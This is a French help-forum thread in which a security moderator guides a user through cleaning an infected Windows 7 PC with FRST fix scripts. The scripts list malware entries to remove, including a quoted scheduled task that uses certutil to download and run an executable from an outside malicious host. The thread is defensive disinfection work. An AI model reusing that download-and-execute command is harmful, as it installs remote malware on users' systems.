Pc très lent presque inutilisable
labellgoss
Messages postés
15
Date d'inscription
Statut
Membre
Dernière intervention
-
bazfile Messages postés 58608 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
bazfile Messages postés 58608 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Bonjour, mon pc est très très lent qu’il en est presque inutilisable je suis sur windows7 et j’ai du réinstaller Windows 7 pour un petit problème. Lors d’une ouverture d’un logiciel cela met 5-10min pour l’ouvrir, des logiciels que je n’ai même pas installé s’installent tout seul sur mon pc, lorsque j’utilise chrome beaucoup de pubs apparaissent toutes les 2min, et aussi mon pc fait énormément de bruit que j’en ai bien peur qu’il explose, il ne faisait pas autant de bruit avant. Je ne sais pas si c’est a cause d’un logiciel que j’ai voulu installer. J’ai essayé de tout nettoyer avec CCleaner et advanced system care mais rien n’y fait. S’il vous plaît aidez moi
A voir également:
- Pc très lent presque inutilisable
- Pc tres lent - Guide
- Reinitialiser pc - Guide
- Test performance pc - Guide
- Downloader for pc - Télécharger - Téléchargement & Transfert
- Mon mac est lent comment le nettoyer - Guide
4 réponses
Bonjour,
CCleaner et advanced system care sont inutiles.
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis ouvre-le tu auras ceci :
Puis coche la case shortcut comme ceci :
Clique sur Analyser à la fin de l'analyse tu auras trois fichiers texte sur le bureau FRST, Addition et Shortcut , attention de bien attendre que les messages disant que l'analyse est terminée s'affichent, ensuite envoie ces rapports sur https://pjjoint.malekal.com/ voir ce tutoriel paragraphe Envoyer les rapports d’analyse sur pjjoint puis donne les trois liens générés par Pjoint dans ton prochain message.
CCleaner et advanced system care sont inutiles.
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis ouvre-le tu auras ceci :
Puis coche la case shortcut comme ceci :
Clique sur Analyser à la fin de l'analyse tu auras trois fichiers texte sur le bureau FRST, Addition et Shortcut , attention de bien attendre que les messages disant que l'analyse est terminée s'affichent, ensuite envoie ces rapports sur https://pjjoint.malekal.com/ voir ce tutoriel paragraphe Envoyer les rapports d’analyse sur pjjoint puis donne les trois liens générés par Pjoint dans ton prochain message.
Pas étonnant que ton pc a du mal à fonctionner il est vraiment très infecté.
Procédure à faire dans l'ordre indiqué :
Pour le démarrage en mode sans échec il suffit de lire attentivement cette page et faire ce qui est indiqué pour démarrer Windows 7 en mode sans échec.
Tu peux imprimer les pages ou prendre des notes car à partir du paragraphe Les options de récupération tu ne seras plus sous Windows tu n'y reviendras qu'une fois en mode sans échec.
2- Copie l'intégralité du script qui est dans l'encadré qui suit :
3- Une fois le script copié clique sur Corriger.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
Procédure à faire dans l'ordre indiqué :
ATTENTION pour que la désinfection fonctionne il faut démarrer ton pc en mode sans échec avec "prise en charge du réseau".
Pour le démarrage en mode sans échec il suffit de lire attentivement cette page et faire ce qui est indiqué pour démarrer Windows 7 en mode sans échec.
Tu peux imprimer les pages ou prendre des notes car à partir du paragraphe Les options de récupération tu ne seras plus sous Windows tu n'y reviendras qu'une fois en mode sans échec.
Une fois Windows démarré en mode sans échec avec prise en charge du réseau
1- Ouvre FRST2- Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CloseProcesses:
HKLM-x32\...\Run: [kissq] => C:\Users\Dalal\AppData\Local\Temp\kissq.exe************ [382464 2020-06-30] () [Fichier non signé]
HKLM\...\RunOnce: [hmhge0fcjm2] => C:\Program Files (x86)\CNoai\367933451.exe [475136 2020-06-19] () [Fichier non signé]
HKLM\...\RunOnce: [system recover] => C:\Program Files (x86)\Adobe\Bolezhegeki.exe [197632 2020-06-30] () [Fichier non signé]
HKLM-x32\...\RunOnce: [wextract_cleanup0] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Dalal\AppData\Local\Temp\IXP000.TMP\"
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [KPKZG6SEKLD8LMS] => C:\Program Files\RMHK4DBCUT\RMHK4DBCU.exe [2768384 2020-06-19] (XJC62SX6) [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [3KP9HX2E14V7MU5] => C:\Program Files\LK35YI0K3K\R7UCT9PNJ.exe [2768384 2020-06-19] (XJC62SX6) [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [2795074] => C:\Users\Dalal\AppData\Roaming\ec0p1nnb4or\2uwloflef5s.exe [853892 2020-06-30] () [Fichier non signé] [Fichier en cours d'utilisation]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [ZGJR226UIF8IKLP] => C:\Program Files\QR24AKSM82\QR24AKSM8.exe [4077056 2020-06-30] (ENN426O@) [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [efinam] => C:\Program Files (x86)\efinam\efinam.dll [15360 2020-06-30] () [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [ShyViolet] => C:\Windows\rss\csrss.exe [3980800 2020-06-30] () [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [CloudNet] => C:\Users\Dalal\AppData\Roaming\97ccdcfc9cef\97ccdcfc9cef.exe [549376 2020-06-30] () [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [6436488] => C:\Users\Dalal\AppData\Roaming\wgeq45r51rf\i3qwbpsbqyz.exe [853892 2020-06-30] () [Fichier non signé] [Fichier en cours d'utilisation]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [PR7B85B97SMKIV4] => C:\Program Files\B2L2GHKUEJ\B2L2GHKUE.exe [4077056 2020-06-30] (ENN426O@) [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\RunOnce: [dnNup] => C:\Users\Dalal\AppData\Local\Temp\25-1ab0e-118-157a1-b92256e3c4a21\Juwadynida.exe [726528 2020-06-30] () [Fichier non signé]
AppInit_DLLs: C:\ProgramData\AppmallosayoV\Toughtop.dll => C:\ProgramData\AppmallosayoV\Toughtop.dll [342528 2020-06-29] () [Fichier non signé]
AppInit_DLLs-x32: C:\ProgramData\AppmallosayoV\Betala.dll => C:\ProgramData\AppmallosayoV\Betala.dll [460800 2020-06-29] () [Fichier non signé]
InternetURL: C:\Users\akram.zoubir.lafamilia-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdrhost.url -> URL: "C:\Users\akram.zoubir.lafamilia-PC\AppData\Roaming\cdrhost\ZRFCSx.vbs"
Startup: C:\Users\Dalal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk [2020-06-19]
ShortcutTarget: SmartClock.lnk -> C:\Users\Dalal\AppData\Roaming\Smart Clock\SmartClock.exe (International GeoGebra Institute) [Fichier non signé]
CHR HKLM\SOFTWARE\Policies\Google: Restriction
Task: {7F3DE65B-78DB-4AA1-A97F-F782AEEFB4CF} - System32\Tasks\NvNgxUpdateCheckDaily_{78821544-1544-1544-1544-788215441544} => C:\Users\Dalal\AppData\Roaming\grtibts [258560 2020-01-03] () [Fichier non signé]
Task: {83A3C1AB-278A-42F5-AD2C-FEE6F2B94CC3} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxps://gfixprice.space/app/app.exe C:\Users\Dalal\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Dalal\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {CF3947EA-1FEC-4059-B78F-4F83A72CE245} - System32\Tasks\Smart Clock => C:\Users\Dalal\AppData\Roaming\Smart Clock\SmartClock.exe [599552 2020-06-19] (International GeoGebra Institute) [Fichier non signé]
Task: {D6D01BC3-2833-416D-900C-01BA9F5AF671} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3980800 2020-06-30] () [Fichier non signé]
HKLM\SYSTEM\ControlSet001\Services\Voyasollam => C:\ProgramData\\Voyasollam\\Voyasollam.exe [4570624 2020-06-29] () [Fichier non signé]
HKLM\SYSTEM\ControlSet001\Services\{45487F67-EC9F-4449-A6F2-2D0970F9B80B} => C:\Windows\System32\drivers\Wdf64811.sys [6559120 2020-06-19] (Accès refusé) [Fichier non signé] <==== ATTENTION (Rootkit!/Service verrouillé)
HKLM\SYSTEM\ControlSet001\Services\Voyasollam => C:\ProgramData\\Voyasollam\\Voyasollam.exe [4570624 2020-06-29] () [Fichier non signé] <==== ATTENTION (Rootkit!/Service verrouillé)
R1 97CCDCFC9CEF; C:\Windows\97CCDCFC9CEF.sys [25368 2020-06-19] (大连纵梦网络科技有限公司 -> FsFilter Network)
R2 6A091B04; C:\ProgramData\6A091B04\C9DF6398.dll [4011520 2020-06-29] () [Fichier non signé]
S3 AppmallosayoV; C:\ProgramData\\AppmallosayoV\\AppmallosayoV.exe [4603392 2020-06-24] () [Fichier non signé]
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2020-06-19] () [Fichier non signé]
R2 ChromeUpdater; C:\Windows\chromesvc.exe [2319872 2020-06-30] () [Fichier non signé]
S3 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe [4570624 2020-06-29]
S3 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (GOLD CLICK LIMITED -> Gold Click Ltd)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zéro octet Fichier/Dossier)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zéro octet Fichier/Dossier)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2020-06-19] (WDKTestCert Admin,131666266076831434 -> ) [Fichier non signé]
C:\Program Files (x86)\CNoai
C:\Program Files (x86)\Adobe\Bolezhegeki.exe
C:\Program Files\RMHK4DBCUT
C:\Program Files\LK35YI0K3K
C:\Users\Dalal\AppData\Roaming\ec0p1nnb4or
C:\Program Files\QR24AKSM82
C:\Program Files (x86)\efinam
C:\Windows\rss\csrss.exe
C:\Users\Dalal\AppData\Roaming\97ccdcfc9cef
C:\Users\Dalal\AppData\Roaming\wgeq45r51rf
C:\Program Files\B2L2GHKUEJ
C:\ProgramData\AppmallosayoV
C:\Users\Dalal\AppData\Roaming\grtibts
C:\ProgramData\\Voyasollam
C:\ProgramData\6A091B04
C:\ProgramData\\CloudPrinter
C:\Program Files (x86)\ProxyGate
C:\Users\Dalal\AppData\Roaming\Smart Clock
EmptyTemp:
End::
3- Une fois le script copié clique sur Corriger.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
5- Fait une nouvelle analyse FRST et donne les liens dans ta réponse.
6- VÉRIFIE ET DIT-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT.
Il faut tapoter sur la touche F5 ou F8 comme si tu faisais du morse dés le démarrage du pc c'est à dire même avant le premier écran du bios, dés le démarrage cela signifie dés qu'il démarre avant qu'un écran apparaisse.
Si tu n'y arrives toujours pas:
Va SUR CETTE PAGEtélécharge MALWAREBYTES ANTI-ROOTKIT
Attention lis très très attentivement le paragraphe "Utilisation" avant de commencer.
Une fois le nettoyage fait avec MALWAREBYTES ANTI-ROOTKIT fait une nouvelle analyse avec FRST, met les liens dans ta réponse.
.
Bonjour, je vous remercie infiniment !! Mon pc est devenu beaucoup plus fluide ! Mais le démarrage reste lent.
voici les liens:
FRST : https://pjjoint.malekal.com/files.php?id=FRST_20200702_z7t7s119y13
Addition : https://pjjoint.malekal.com/files.php?id=20200702_c13q13o6e14o6
Shortcut : https://pjjoint.malekal.com/files.php?id=20200702_o11m8f8s6i10
voici les liens:
FRST : https://pjjoint.malekal.com/files.php?id=FRST_20200702_z7t7s119y13
Addition : https://pjjoint.malekal.com/files.php?id=20200702_c13q13o6e14o6
Shortcut : https://pjjoint.malekal.com/files.php?id=20200702_o11m8f8s6i10
Il reste encore pas mal de choses mais c'est beaucoup mieux.
Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
3- Une fois le script copié clique sur Corriger.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
5- Réinitialise tes navigateurs internet https://forums.commentcamarche.net/forum/affich-37585758-reinitialiser-son-navigateur
Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CreateRestorePoint:
CloseProcesses:
InternetURL: C:\Users\akram.zoubir.lafamilia-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdrhost.url -> URL: "C:\Users\akram.zoubir.lafamilia-PC\AppData\Roaming\cdrhost\ZRFCSx.vbs"
HKLM-x32\...\Run: [kissq] => C:\Users\Dalal\AppData\Local\Temp\kissq.exe************
CHR HKLM\SOFTWARE\Policies\Google: Restriction
Task: {7F3DE65B-78DB-4AA1-A97F-F782AEEFB4CF} - System32\Tasks\NvNgxUpdateCheckDaily_{78821544-1544-1544-1544-788215441544} => C:\Users\Dalal\AppData\Roaming\grtibts.exe
Task: {83A3C1AB-278A-42F5-AD2C-FEE6F2B94CC3} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxps://gfixprice.space/app/app.exe C:\Users\Dalal\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Dalal\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {CF3947EA-1FEC-4059-B78F-4F83A72CE245} - System32\Tasks\Smart Clock => C:\Users\Dalal\AppData\Roaming\Smart Clock\SmartClock.exe
R1 97CCDCFC9CEF; C:\Windows\97CCDCFC9CEF.sys [25368 2020-06-19] (大连纵梦网络科技有限公司 -> FsFilter Network)
S3 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe shuz -f "C:\ProgramData\\CloudPrinter\\CloudPrinter.dat" -l -a
C:\Users\Dalal\AppData\Roaming\Smart Clock
C:\Windows\system32\Tasks\Smart Clock
C:\Users\Dalal\AppData\Roaming\grtibts.exe
C:\ProgramData\CloudPrinter
C:\Program Files (x86)\ProxyGate
RemoveProxy:
EmptyTemp:
End::
3- Une fois le script copié clique sur Corriger.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
5- Réinitialise tes navigateurs internet https://forums.commentcamarche.net/forum/affich-37585758-reinitialiser-son-navigateur
6- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT
7- Fait une nouvelle analyse FRST
Bonsoir ,
Ces symptômes présente le comportement d'un cheval de troie ou un logiciel publicitaire !
Ce qui peut provoquer la perte de données, le vol des informations , le dommage de ton système !
Ici télécharge kaspersky virus removal tool en mode sans échec avec prise en charge du réseau :
https://www.kaspersky.com/downloads/thank-you/free-virus-removal-tool
exécute le puis scan ton pc et nettoyer !
tu ne ne sais pas maintenant si les malware ont volé tes informations ou non !
Quel est le logiciel , le fichier que tu as exécuté avant que ces symptôme n'apparaissent ?
télécharge malwarebytes Anti malware en mode sans échec et corrige tous les virus dans le registre et efface les fichiers temporaires par ce que là normalement ce trouvent les ficheirs des virus ;
C:\Users\(Nom d'utlilisateur)\Appdata\Local\Temp
Puis efface tous les fichiers là , Attention n'efface pas le dossiers mais les fichiers et les dossiers à l'intérieur de lui
J'espère t'aider
Ces symptômes présente le comportement d'un cheval de troie ou un logiciel publicitaire !
Ce qui peut provoquer la perte de données, le vol des informations , le dommage de ton système !
Ici télécharge kaspersky virus removal tool en mode sans échec avec prise en charge du réseau :
https://www.kaspersky.com/downloads/thank-you/free-virus-removal-tool
exécute le puis scan ton pc et nettoyer !
tu ne ne sais pas maintenant si les malware ont volé tes informations ou non !
Quel est le logiciel , le fichier que tu as exécuté avant que ces symptôme n'apparaissent ?
télécharge malwarebytes Anti malware en mode sans échec et corrige tous les virus dans le registre et efface les fichiers temporaires par ce que là normalement ce trouvent les ficheirs des virus ;
C:\Users\(Nom d'utlilisateur)\Appdata\Local\Temp
Puis efface tous les fichiers là , Attention n'efface pas le dossiers mais les fichiers et les dossiers à l'intérieur de lui
J'espère t'aider
Bonjour.
Il faut surtout faire du tri dans tes programmes (ceux que tu n'utilises pas) et faire un scan avec un bon antivirus. Tu peux aussi aller dans le gestionnaire des tâches (Ctrl + Maj + Echap) et aller dans l'onglet "Démarrage", puis vérifier que les programmes inutiles ne se lancent pas au démarrage. En espérant avoir pu t'aider. Bon courage !
Il faut surtout faire du tri dans tes programmes (ceux que tu n'utilises pas) et faire un scan avec un bon antivirus. Tu peux aussi aller dans le gestionnaire des tâches (Ctrl + Maj + Echap) et aller dans l'onglet "Démarrage", puis vérifier que les programmes inutiles ne se lancent pas au démarrage. En espérant avoir pu t'aider. Bon courage !
| ***** Signature modifiée par la modération
Ne pas s'attribuer la fonction de contributeur dans sa signature quand on ne l'est pas. |
Voici les liens,
FRST : https://pjjoint.malekal.com/files.php?id=FRST_20200701_c15z5c9l6y9
Addition:
https://pjjoint.malekal.com/files.php?id=20200701_j8h15i8m14g11
Shortcut:
https://pjjoint.malekal.com/files.php?id=20200701_y14x14d12t9u11